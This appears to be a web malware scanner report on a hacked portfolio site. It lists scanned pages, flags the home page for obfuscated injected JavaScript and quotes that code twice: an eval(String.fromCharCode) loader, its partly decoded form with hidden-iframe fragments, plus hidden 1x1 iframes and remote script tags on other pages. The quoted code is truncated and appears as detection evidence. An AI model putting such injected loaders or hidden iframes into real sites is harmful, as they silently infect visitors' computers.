Malware Scanner report for brindusa-design.com

Malicious/Suspicious/Total urls checked: 2/2/15

4 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "brindusa-design.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/3/3

3 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=brindusa-design.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://brindusa-design.com/	200 OK Content-Length: 25610 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43, ... 21428 bytes are skipped ...2,40,118,41,101,61,119,105,110,100,111,119,91,118,43,34,108,34,93,59,119,61,102,59,115,61,91,93,59,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10)); Decoded script: try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,36 ... 47845 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: AntiVir JS/iFrame.BO.1 Avast JS:Redirector-XU [Trj] Ikarus Exploit.JS.Blacole nProtect JS:Trojan.JS.Iframe.BO K7AntiVirus Trojan Emsisoft JS:Trojan.JS.Iframe.BO (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV DrWeb JS.IFrame.278 Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/BlacoleRef.W MicroWorld-eScan JS:Trojan.JS.Iframe.BO Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-4 F-Secure JS:Trojan.JS.Iframe.BO F-Prot JS/IFrame.QW AVG HTML/Framer GData JS:Trojan.JS.Iframe.BO Commtouch JS/IFrame.QW BitDefender JS:Trojan.JS.Iframe.BO
http://www.google-analytics.com/urchin.js	200 OK Content-Length: 22678 Content-Type: text/javascript	clean
http://brindusa-design.com/index.html	200 OK Content-Length: 25610 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117,109,101,110,116,91,40,120,41,63,34,99,34,43,34,114,34,58,50,43,34,101,34,43,34,97,34,43,34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,43,34,109,34,43,40,40,102,41,63,34,101,34,43,34,110,34,43,34,116,34,58,34,34,41,93,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,113,43, ... 21428 bytes are skipped ...2,40,118,41,101,61,119,105,110,100,111,119,91,118,43,34,108,34,93,59,119,61,102,59,115,61,91,93,59,114,61,83,116,114,105,110,103,59,122,61,40,40,101,41,63,34,67,111,100,101,34,58,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10)); Decoded script: try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,36 ... 47845 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports: AntiVir JS/iFrame.BO.1 Avast JS:Redirector-XU [Trj] Ikarus Exploit.JS.Blacole nProtect JS:Trojan.JS.Iframe.BO K7AntiVirus Trojan Emsisoft JS:Trojan.JS.Iframe.BO (B) Comodo TrojWare.JS.Agent.AM CAT-QuickHeal JS/BlacoleRef.BV DrWeb JS.IFrame.278 Kaspersky HEUR:Trojan.Script.Generic Microsoft Trojan:JS/BlacoleRef.W MicroWorld-eScan JS:Trojan.JS.Iframe.BO Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Expack.uvpsi ClamAV JS.Trojan.Blacole-4 F-Secure JS:Trojan.JS.Iframe.BO F-Prot JS/IFrame.QW AVG HTML/Framer GData JS:Trojan.JS.Iframe.BO Commtouch JS/IFrame.QW BitDefender JS:Trojan.JS.Iframe.BO
http://brindusa-design.com/pdf/Resume-Brindusa-Dumitrascu.pdf	200 OK Content-Length: 25204 Content-Type: application/pdf	clean
http://brindusa-design.com/test404page.js	404 Not Found Content-Length: 6547 Content-Type: text/html	suspicious
Hidden iFrame found. size: 1x1 src: http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67 <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.google.ca/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d%2b%56%61%6e%63%6f%75%76%65%72%2b%68%6f%73%74%69%6e%67" style="width: 1px; height: 1px"> Hidden iFrame found. size: 1x1 src: http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.alexa.com/search?q=%64%61%74%61%71%75%61%6e%74%75%6d%2e%63%6f%6d" style="width: 1px; height: 1px"> Hidden iFrame found. size: 1x1 src: http://www.dataquantum.com/en/ <iframe id="i1" border="0" framespacing="0" frameborder="0" name="i1" scrolling="no" src="http://www.dataquantum.com/en/" style="width: 1px; height: 1px">
http://pagead2.googlesyndication.com/pagead/show_ads.js	200 OK Content-Length: 21987 Content-Type: text/javascript	clean
http://brindusa-design.com/portfolio.html	200 OK Content-Length: 3735 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://tomdoustlawyer.com/drug-crimes_files/6JK8ktzB.php?id=19265"></script>
http://brindusa-design.com/email-branding.html	200 OK Content-Length: 7569 Content-Type: text/html	suspicious
Suspicious code found <script type="text/javascript" src="http://tomdoustlawyer.com/drug-crimes_files/6JK8ktzB.php?id=19258"></script>
http://brindusa-design.com/img/california.jpg	200 OK Content-Length: 107658 Content-Type: image/jpeg	clean
http://brindusa-design.com/img/florida-1.jpg	200 OK Content-Length: 301160 Content-Type: image/jpeg	clean
http://brindusa-design.com/img/florida-2.jpg	200 OK Content-Length: 271426 Content-Type: image/jpeg	clean
http://brindusa-design.com/img/georgia.jpg	200 OK Content-Length: 213264 Content-Type: image/jpeg	clean
http://brindusa-design.com/img/michigan.jpg	200 OK Content-Length: 237986 Content-Type: image/jpeg	clean
http://brindusa-design.com/img/new-jersey-1.jpg	200 OK Content-Length: 213521 Content-Type: image/jpeg	clean
http://brindusa-design.com/img/new-jersey-2.jpg	200 OK Content-Length: 251113 Content-Type: image/jpeg	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: brindusa-design.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Apr 2014 19:06:12 GMT
Accept-Ranges: bytes
ETag: "1c6c07d-640a-41422540"
Server: Apache/2.2.3 (CentOS)
Content-Length: 25610
Content-Type: text/html
Last-Modified: Sat, 12 Apr 2014 15:39:25 GMT
X-Powered-By: PleskLin

...25610 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: brindusa-design.com
Referer: http://www.google.com/search?q=brindusa-design.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for brindusa-design.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools